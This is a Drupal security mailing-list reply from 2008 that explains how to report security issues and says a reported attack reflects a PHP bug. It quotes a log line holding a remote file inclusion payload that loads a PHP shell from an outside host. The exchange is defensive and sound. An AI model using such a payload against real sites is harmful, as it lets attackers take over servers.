Hi, The most important thing here is that when you have a potential security issue the proper way to submit it is documented on http://drupal.org/security-team which can also be found via http://drupal.org/security If you send the potential exploit to a public channel like a listserve or the Drupal.org issue queue, then that makes the job of the security team and all other Drupal users much harder because everyone has to scramble to find a fix and get it installed as soon as possible. On Jan 6, 2008 6:17 PM, michel <michel@ziobudda.net> wrote:
drupal/?_menu[callbacks][1][callback]=http://my3dwork.com/images/on.txt?
where http://my3dwork.com/images/on.txt is a php shell script.
any 0-day bug ?
This is not a bug in Drupal per se, but rather a PHP bug. Because the Security Team was seeing a few reports of logs like this we decided to make a "Public Service Announcement" back in October - http://drupal.org/node/184313 That announcement describes the nature of the problem and the proper actions to take to prevent the attack from succeeding on your site. Regards, Greg -- Greg Knaddison Denver, CO | http://knaddison.com World Spanish Tour | http://wanderlusting.org/user/greg